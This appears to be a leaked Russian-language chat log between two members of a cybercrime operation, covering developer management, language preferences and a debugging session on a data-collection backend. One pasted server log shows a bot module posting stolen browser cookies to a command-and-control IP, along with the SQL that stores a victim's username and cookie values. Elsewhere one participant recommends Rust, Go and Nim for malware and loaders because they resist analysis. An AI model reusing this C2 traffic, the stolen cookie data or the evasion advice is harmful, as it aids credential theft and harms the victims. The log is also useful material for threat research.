Timestamp	From	To	Message
2020-06-22 12:00:31.474255	buza	zulas	Уважаемые разработчики!
Я благодарен всем, кто освоил багтрекер и активно в нем работает, вы молодцы)
Призываю тех из вас, кто вообще не работает багтрекере, активней включаться в работу с ним.
Переходной период не такой уж большой, и он уже заканчивается.
Не хотелось бы применять санкции (
2020-09-02 12:52:56.783476	buza	zulas	Привет всем.
Всем разработчикам, включая веб, просьба скинуть мне краткий список своих скиллов по языкам программирования и стекам.
Спасибо.
2020-09-09 20:05:33.365684	buza	zulas	Привет всем.
Всем разработчикам, включая веб, просьба скинуть мне краткий список своих скиллов по языкам программирования и стекам.
Спасибо.
2020-09-09 20:54:43.963130	zulas	buza	Erlang, PHP, JS, Forth-83, Matlab
2020-09-10 07:41:31.865510	zulas	buza	Erlang, PHP, JS, Forth-83, Matlab
2020-09-10 09:00:31.359660	buza	zulas	принял
2020-09-10 09:00:37.413203	buza	zulas	у тебя крутой стек между прочим
2020-09-10 09:00:41.214346	buza	zulas	оч необычный
2020-09-13 13:39:02.612233	buza	zulas	принял
2020-09-13 13:39:02.613531	buza	zulas	у тебя крутой стек между прочим
2020-09-13 13:39:02.614286	buza	zulas	оч необычный
2020-09-13 13:39:41.542641	zulas	buza	забыл сишку написать )
2020-09-13 13:40:19.529530	zulas	buza	ну с этими языками я работал ) .. с какими то 25 лет назад . с какими то 15 ... с какими то 10-5 )
2020-09-13 13:40:50.382962	zulas	buza	25 конечно загнул ) но 22 точно
2020-09-14 06:38:26.061501	zulas	buza	забыл сишку написать )
2020-09-14 06:38:26.066890	zulas	buza	ну с этими языками я работал ) .. с какими то 25 лет назад . с какими то 15 ... с какими то 10-5 )
2020-09-14 06:38:26.069765	zulas	buza	25 конечно загнул ) но 22 точно
2020-09-14 07:27:37.612219	buza	zulas	Коллеги, с прошедшим профессиональным праздником)
LET A = A + 1
2020-09-17 14:39:45.265513	buza	zulas	Коллеги, с прошедшим профессиональным праздником)
LET A = A + 1
2020-10-13 11:01:14.675900	buza	zulas	privet mayakni kak budesh
2020-10-13 15:38:41.099200	buza	zulas	privet mayakni kak budesh
2020-10-13 15:39:08.216532	zulas	buza	маякую
2020-10-13 15:39:15.021272	zulas	buza	мне лучше сразу писать что ты хочешь писать
2020-10-14 07:46:35.102353	zulas	buza	маякую
2020-10-14 07:46:35.113423	zulas	buza	мне лучше сразу писать что ты хочешь писать
2021-08-27 09:29:17.322472	buza	zulas	привет
2021-08-27 09:52:31.721039	zulas	buza	привет
2021-08-27 09:52:42.221281	buza	zulas	помоги там плиз с бэком
2021-08-27 09:52:47.349214	buza	zulas	деф говорит ты в курсе проблемы
2021-08-27 09:53:03.468160	zulas	buza	привет да . надо конфу собрать .
2021-08-27 09:53:06.923116	zulas	buza	с клиентским
2021-08-27 09:53:34.035025	zulas	buza	еще можно зайти на сервер где моя програ крутится ?
2021-08-27 09:53:58.833250	buza	zulas	тебе напишет сейчас driver@
2021-08-27 09:54:07.760413	buza	zulas	дальше в рабочем порядке, доступы через дефа
2021-08-27 09:54:11.212511	buza	zulas	конфу соберем
2021-08-27 13:42:41.310682	buza	zulas	слушай
2021-08-27 13:42:51.133678	buza	zulas	ты ведь знаешь протокол HTTP?
2021-08-27 13:43:07.405468	zulas	buza	знаю ) я вообще должен ожидать там чистый текст
2021-08-27 13:43:27.375375	buza	zulas	у меня затруднение со словом "там"
2021-08-27 13:44:02.578681	zulas	buza	а у меня нет ) у меня только затруднения в том . что я не вижу нормального хттп
2021-08-27 13:44:10.849111	buza	zulas	POST / HTTP/1.1
Content-Type:
Content-Length:
Content-Encoding:
Transfer-Encoding: multipart/form-data
2021-08-27 13:44:16.254825	buza	zulas	далее тело запроса
2021-08-27 13:44:25.639586	buza	zulas	ты что, хочешь сказать что заголовков нет вообще?
2021-08-27 13:44:52.648045	zulas	buza	ну ты скачал файлы ?
2021-08-27 13:44:58.692368	buza	zulas	скачал
2021-08-27 13:45:15.056415	buza	zulas	в них нет заголовков HTTP
2021-08-27 13:45:16.234032	zulas	buza	бывает нормальные проскакивают .. с POST
а бывает такие вот как в файлах
2021-08-27 13:45:52.766592	buza	zulas	то есть тебе приходит запрос без заголовков вообще
2021-08-27 13:46:01.306363	buza	zulas	верно?
2021-08-27 13:46:36.186020	zulas	buza	ну вот ты видел что приходит
2021-08-27 13:47:00.083279	buza	zulas	это конечно очень сильный постмодернизьм, но я могу предположить еще что это HTTP/2.0
2021-08-27 13:47:15.697249	zulas	buza	а он там вообще должен быть ?
2021-08-27 13:47:16.829900	buza	zulas	хотя я не помню чтобы хоть один из модулей был переделан на его поддержку
2021-08-27 13:47:33.659196	buza	zulas	он не должен там быть, но я могу предположить почему он там может оказаться
2021-08-27 13:47:45.522056	buza	zulas	например как результат конверсии запроса на прокладке
2021-08-27 13:48:06.871998	zulas	buza	ну вот в файле good.raw просвечивает http 1.1
2021-08-27 13:48:08.689192	buza	zulas	или потому что кто-то переделал модуль на стек winhttp с включенным http/2 и никому не сказал
2021-08-27 13:48:15.490845	buza	zulas	ну это пиздец
2021-08-27 13:48:40.181963	buza	zulas	а ты можешь прислать хорошие запросы, ты говоришь проскакивает нормальный POST ?
2021-08-27 13:48:44.472805	buza	zulas	так что видно что все норм
2021-08-27 13:48:49.807992	zulas	buza	да могу . щас фильтрану
2021-08-27 13:49:57.455915	buza	zulas	я знаешь че думаю
2021-08-27 13:50:10.841049	buza	zulas	что там где POST, Это может быть просто перехват HTTP POST в виде как есть
2021-08-27 13:50:18.302518	zulas	buza	2021-08-27 16:43:08.319 [info] <0.3245.1>@http_handler:handle:20 Path /lib30/NASEEMCASH1_W617601.36CB7F3C9950F33B641F14CB7724D3DB/84/
2021-08-27 16:43:08.319 [info] <0.3245.1>@http_handler:handle:29 Request for {client,undefined,<<"NASEEMCASH1_W617601.36CB7F3C9950F33B641F14CB7724D3DB">>,{3948389396567356219,7214507992180642779},<<"NASEEMCASH1">>,<<"lib30">>,<<"windows">>,<<"617601">>,undefined,undefined,<<"NASEEMCASH1_W617601">>} <<"84">> [<<>>]
2021-08-27 16:43:08.319 [info] <0.3245.1> Data: <<"POST /lib30/NASEEMCASH1_W617601.36CB7F3C9950F33B641F14CB7724D3DB/84/ HTTP/1.1\r\nAccept: */*\r\nContent-Type: multipart/form-data; boundary=---------XTYXAMVRSGLSDPSR\r\nConnection: Close\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Tablet PC 2.0)\r\nHost: 103.56.207.249:443\r\nContent-Length: 90184\r\nCache-Control: no-cache\r\n\r\n-----------XTYXAMVRSGLSDPSR\r\nContent-Disposition: form-data; name=\"data\"\r\n\r\nQWRtaW5pc3RyYXRvcg==|IE|MjQ2MDU5MTM1LmxvZy5vcHRpbWl6ZWx5LmNvbQ==|ZW5kX3VzZXJfaWQ=|b2V1MTM4ODIxNDM1MzQ3MnIwLjExMDEyMzM5MTYwNjcyODA3|1240428402|1240428402|Lw==\r\nQWRtaW5pc3RyYXRvcg==|IE||||1240428288|1240428288|\r\nQWRtaW5pc3RyYXRvcg==|IE|M2EyaWxhdGkuY29t|T1hfc2Q=|MQ==|1240428412|1240428412|Lw==\r\nQWRtaW5pc3RyYXRvcg==|IE|MzM2NWZjNTU2Y2I1YWQwODdkMTU4YjUyY2I1NTUzNDQxYTlmNjA4NjIzLTEzMjUwMDgzNTM0NGVjZWQ=||X2VtX3Z0|1240428288|1240428288|\r\nQWRtaW5pc3RyYXRvcg==|IE|ZTFkNmEyNDUyODU0MGU2ZTQ3ODQ2ODQ4NGQ1YjUzNDRlY2VkYWFjZDg1LTUzODAzMzAzNTM0NGVjZWQ=||X2VtX3Y=|1240428288|1240428288|\r\nQWRtaW5pc3RyYXRvcg==|IE|LTE=||X2VtX3N2|1240428288|1240428288|\r\nQWRtaW5pc3RyYXRvcg==|IE|MQ==||X2VtX2hs|1240428288|1240428288|\r\nQWRtaW5pc3RyYXRvcg==|IE|OTM5NjAxNTkuMTM2NDE3MDI5MS4xMzk3MDI2MDI4LjEzOTcwMjYwMjguMTM5Nz...">> 
2021-08-27 16:43:17.173 [info] <0.3245.1>@db:equery:46 equery <<"INSERT INTO data84 (created_at, \"group\", id_low, id_high, username, browser, \"domain\", cookie_name, cookie_value, created, expires, path ) VALUES ( now(), $1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11 )">> [<<"lib30">>,7214507992180642779,3948389396567356219,<<"Administrator">>,<<"IE">>,<<"246059135.log.optimizely.com">>,<<"end_user_id">>,<<"oeu1388214353472r0.11012339160672807">>,<<"1240428402">>,<<"1240428402">>,<<"/">>]
2021-08-27 13:50:19.729454	buza	zulas	в смысле, это не заголовки, а это тело )
2021-08-27 13:50:29.426050	buza	zulas	да да
2021-08-27 13:50:42.491913	zulas	buza	я хз .. я поставил логирование в самом начале .. т.е. лог показывает то что мне приходит как оно есть
2021-09-10 13:20:27.391516	zulas	buza	привет . .вам Rust разработчик не нужен ? Solana слышал о таком ?
2021-09-10 15:39:49.325293	buza	zulas	привет
2021-09-10 15:40:00.543519	buza	zulas	солана это ник?
2021-09-10 17:20:46.005005	zulas	buza	https://solana.com/
https://habr.com/ru/post/560566/
2021-09-10 19:39:28.072951	zulas	buza	https://solana.com/
https://habr.com/ru/post/560566/
2021-09-10 19:40:10.822438	buza	zulas	возможно нужен
2021-09-12 07:28:13.119490	buza	zulas	возможно нужен
2021-09-12 08:40:50.095526	zulas	buza	а конкретнее ?
2021-09-13 08:01:30.169011	zulas	buza	а конкретнее ?
2021-09-13 12:50:21.743065	buza	zulas	ку
2021-09-13 15:15:49.964779	buza	zulas	ку
2021-09-13 15:32:30.638051	zulas	buza	ку
2021-09-14 07:33:28.416089	zulas	buza	ку
2021-09-14 07:33:39.984420	buza	zulas	я тут
2021-09-14 10:05:14.668704	buza	zulas	я тут
2021-09-14 10:05:36.468422	zulas	buza	и я тут .. ты что то писал мне
2021-09-14 10:05:45.743080	buza	zulas	привет
2021-09-14 10:05:58.586484	buza	zulas	нужен скорее по блокчейну человек
2021-09-14 10:06:06.349167	buza	zulas	но там проект идет медленно
2021-09-14 10:06:10.985219	zulas	buza	я по нему ноль
2021-09-14 10:06:17.853153	buza	zulas	так твой чел по расту не ноль
2021-09-14 10:06:20.461183	buza	zulas	солана это блокчейн
2021-09-14 10:06:37.193147	zulas	buza	я просто хотел начать с Rust что то делать .. вот подумал может есть какие для тебя интересные темы
2021-09-14 10:06:51.003326	buza	zulas	что с отр у тебя?
2021-09-14 10:07:29.874625	zulas	buza	) да .. так я и говорю .. Солана на расте писана .. соотвественно я растом хочу занятся, ну и чтобы с пользой было -- солану ковырять .
ну а чтобы польза не только мне была ... то ковырять можно с какой то целью
2021-09-14 10:07:49.551959	zulas	buza	> что с отр у тебя?
не понял вопроса
2021-09-14 10:08:25.633744	buza	zulas	не включается
2021-09-14 10:09:22.709012	zulas	buza	я его не ставил
2021-09-14 10:09:27.189508	zulas	buza	забил так сказать
2021-09-14 10:12:29.787323	zulas	buza	так что с соланой ?
2021-09-14 10:15:04.170123	buza	zulas	погодь
2021-09-14 10:15:12.061243	buza	zulas	пару мин
2021-09-14 10:20:44.932259	buza	zulas	да не то что с соланой
2021-09-14 10:20:47.498681	buza	zulas	я думал уже есть опыт
2021-09-14 10:20:57.280979	buza	zulas	сам по себе раст хорош чтобы лоадеры писать и всякую малварь )
2021-09-14 10:21:13.650576	buza	zulas	т.к. это не С++ и его анализировать хуже, что автоматически что вручную
2021-09-14 10:23:09.959576	zulas	buza	почему хуже ? ) ну тот же асм код
2021-09-14 10:23:21.881504	zulas	buza	ну может просто средств анализа не так сильно пописано .. ну напишут
2021-09-14 10:23:41.995327	buza	zulas	это уже известный факт
2021-09-14 10:23:52.383828	zulas	buza	малварь писать не хочу .. )
2021-09-14 10:23:54.207590	buza	zulas	rust go nim и даже с#
2021-09-14 10:24:25.097124	zulas	buza	малварь на шарпе -- это как в космос полететь на бейсике .. у него рантайм жирный ) не нужен такой
2021-09-14 10:26:35.754731	zulas	buza	так где я могу применить раст у тебя ?
2021-09-14 10:26:52.374932	buza	zulas	в написании малвари
2021-09-14 10:27:54.930712	buza	zulas	дался тебе этот раст
2021-09-14 10:28:04.150012	buza	zulas	это все гогно )
2021-09-14 10:28:22.589828	buza	zulas	гугл продвигает его Линусу, давай чувак пиши пиши ядро на нем
2021-09-14 10:28:36.816086	buza	zulas	а сам ни хера, не использует ни в каких своих проектах )
2021-09-14 10:28:43.296599	buza	zulas	диверсанты хреновы
2021-09-14 10:28:52.837132	zulas	buza	у гугла есть голанг )
2021-09-14 10:29:00.265356	buza	zulas	еще худшее гогно
2021-09-14 10:29:03.489254	buza	zulas	пиздец просто
2021-09-14 10:29:08.170751	zulas	buza	а что не гогно ?
2021-09-14 10:29:19.347543	buza	zulas	я даже подумать не мог что Ритчи так запомоится
2021-09-14 10:29:24.435125	buza	zulas	Си
2021-09-14 10:29:36.280635	zulas	buza	а .. так ты пенсионер сишник )
2021-09-14 10:29:44.171139	buza	zulas	я реалист
2021-09-14 10:30:01.989526	zulas	buza	так чем тогда гогно раст ?
2021-09-14 10:30:15.912485	buza	zulas	малым пробегом
2021-09-14 10:30:38.189263	buza	zulas	качества самого языка даже неважны, как и для го
2021-09-14 10:30:53.398860	buza	zulas	все проблемы что у меня всплывали были именно с нестабильной и незрелой экосистемой
2021-09-14 10:31:17.623444	buza	zulas	оно все не готово для прода, несмотря на надувание щёк
2021-09-14 10:32:22.695655	zulas	buza	а эрланг ?
2021-09-14 10:32:41.905550	buza	zulas	я очень мало о нем знаю, спустя столько лет
2021-09-14 10:32:53.461336	buza	zulas	думаю что он очень эффективен
2021-09-14 10:33:03.236087	zulas	buza	ну ... большой пробег .. но тоже гогно в твоем понимании )
2021-09-14 10:33:10.307725	buza	zulas	нет, он нет
2021-09-14 10:33:32.887604	zulas	buza	так а что тогда от вас задач нету по написанию чего то нового  ?
2021-09-14 10:33:46.058423	buza	zulas	причина простая
2021-09-14 10:33:57.572986	buza	zulas	это экзотика, на которую не найти спецов на рынке
2021-09-14 10:34:01.964360	buza	zulas	их тупо нету
2021-09-14 10:34:19.049595	buza	zulas	а на пхп по девять семдесять за килограмм
2021-09-14 10:34:43.826197	buza	zulas	это же кстати относится к любой экзотике - набор людей
2021-09-14 10:34:46.457858	zulas	buza	ну вот я есть ) а задач нету
2021-09-14 10:34:50.313200	buza	zulas	и к расту и к го
2021-09-14 10:35:06.489172	zulas	buza	ну .. го уже не экзотика по сравнению с растом .. но меня что то на раст тянет
2021-09-14 10:35:32.848446	zulas	buza	видимо потому что экзотика
2021-09-14 10:35:48.461682	zulas	buza	а ближе к пенсии я с хаскелем разберусь ... вот там уж экзотика-экзотик
2021-09-14 10:38:50.713559	zulas	buza	так что пишем на эрле нового ? )
2021-09-14 10:40:23.959099	buza	zulas	я бы лучше дал задачу тебе обучить людей эрлу
2021-09-14 10:41:51.528362	buza	zulas	вот смотри
2021-09-14 10:41:59.177192	buza	zulas	я еще раз повторю про экзотику
2021-09-14 10:42:22.530687	buza	zulas	я ведь набираю людей постоянно, сталкиваюсь с законами рынка
2021-09-14 10:42:30.993518	buza	zulas	и я давно в ит, очень давно
2021-09-14 10:42:52.578420	buza	zulas	есть желание разработчиков к новому интересному
2021-09-14 10:42:59.750285	buza	zulas	и есть законы эволюции
2021-09-14 10:43:26.504630	buza	zulas	по законам эволюции, востребованы хорошо проверенные решения, обкатанные временем, от которых отвалилось все лишнее
2021-09-14 10:43:34.404180	buza	zulas	как например колесо или кобол
2021-09-14 10:43:55.526886	buza	zulas	новая экзотика появляется и умирает, точно так же как биологические виды
2021-09-14 10:44:08.142994	buza	zulas	тот кто себя зарекомендует, он остается на рынке
2021-09-14 10:44:10.365308	zulas	buza	кобол востребован - потому на нем дохрена легаси в банках ) и там бородатые очкарики рулят .. я таким буду лет через 30 )
2021-09-14 10:44:24.423665	buza	zulas	ровно такая же ситуация с эрлангом
2021-09-14 10:44:28.994548	buza	zulas	как и с коболом
2021-09-14 10:44:32.960756	zulas	buza	по части обучения -- обучить можно, но это дорого стоит т.к. фактически обучаю конкурентов себе )
2021-09-14 10:45:13.187742	zulas	buza	нет .. эрл живее всех живых ) ..
ну если хипстерское -- то эликсир )
2021-09-14 10:45:16.604885	buza	zulas	он хорошо шел в свои годы, но теперь по нему никого нету на рынке и он легаси
2021-09-14 10:45:41.991742	buza	zulas	вот например node.js - он возник, он себя зарекомендовал, он наравне с пхп сейчас
2021-09-14 10:46:01.071225	buza	zulas	ткаие дела
2021-09-14 10:46:13.274341	zulas	buza	такое же унылое г .. скажи нода умеет параллелится ? .. да вообще джабаскрипт - это такое уёбище ) неподдерживаемое
2021-09-14 10:46:29.122591	zulas	buza	что написал один -- второй хрен поддерживать сможет )
2021-09-14 10:46:45.054840	buza	zulas	это вообще никого не волнует что может язык
2021-09-14 10:46:54.483972	buza	zulas	волнует только где взять человека на него
2021-09-14 10:47:04.157558	buza	zulas	если есть резюме по ним, то и хорошо
2021-09-14 10:47:11.079306	buza	zulas	если нет, то язык не будет востребован
2021-09-14 10:47:25.725033	zulas	buza	ну как не волнует --- если гвозди микроскопом забирвать -- то далеко не уедиш
2021-09-14 10:47:39.264378	buza	zulas	причем лучше взять очень плохой язык, по которому очень дешевые специалисты, чем очень хороший и с небольшим количеством спецов
2021-09-14 10:47:56.291378	zulas	buza	я с тобой согласен ) .. но если так рассуждать . то только СИ был бы живее всех живых
2021-09-14 10:48:05.977165	buza	zulas	я тебе говорю реальную логику, которой руководствуюсь и я, и все кто набирает людей
2021-09-14 10:48:17.707444	zulas	buza	да я понимаю ) ..
2021-09-14 10:48:41.932267	zulas	buza	сайтеги писать на ноде конечно можно ) а вот нормальный сервис запилить ... тут уже ответственно нужно подходить
2021-09-14 10:52:09.962041	zulas	buza	так что про эликсир скажешь ? это же эрланг тот же
2021-09-14 10:53:40.265912	buza	zulas	то что я о нем ничего не знаю
2021-09-14 10:54:50.989919	zulas	buza	странно .. он сейчас более в хайпе чем эрл
2021-09-14 10:55:06.807772	zulas	buza	тот же эрл только сбоку .. почитай )
2021-09-14 10:55:08.935962	zulas	buza	типа современный
2021-09-14 11:32:32.338572	zulas	buza	так что с растом то --- гогно не нужное ? )
2021-09-14 11:33:44.971348	buza	zulas	да я ж сказал
2021-09-14 11:33:53.974297	buza	zulas	он хорош как экзотика именно в малвари
2021-09-14 11:35:19.332849	zulas	buza	малвари не для меня .. где мы можем найти еще точек пересечения друг для друга ?
2021-09-14 11:37:54.441524	buza	zulas	зачем по-твоему юзается твой бэкенд?
2021-09-14 11:40:04.187987	zulas	buza	сбор каких то данных .. но мне это не интересно
2021-09-14 11:40:58.493582	zulas	buza	клиента я не пишу . так что формально руки у меня белые )
2021-09-14 11:44:34.953077	buza	zulas	я отойду, подумаю
2021-09-14 11:44:41.899707	buza	zulas	так значит ты не хочешь пачкать руки )
2021-09-14 11:45:02.523073	buza	zulas	вот такой вопрос
2021-09-14 11:45:08.968222	buza	zulas	как у тебя с СУБД?
2021-09-14 11:45:45.395849	zulas	buza	стандартно ) скуль .. всякие хранимки не очень . это не моё
2021-09-14 11:46:00.486170	zulas	buza	считаю что БД не должна содержать бизнес логику
2021-09-14 11:46:03.116858	buza	zulas	мне нужен спец по субд
2021-09-14 11:46:16.088360	buza	zulas	причем по разным, по множеству, с хорошим опытом
2021-09-14 11:46:20.281251	zulas	buza	ковырять параметры всякие ?
2021-09-14 11:46:54.434857	buza	zulas	нет
2021-09-14 11:47:02.682722	buza	zulas	бигдата
2021-09-14 11:56:43.867421	zulas	buza	а что именно ?
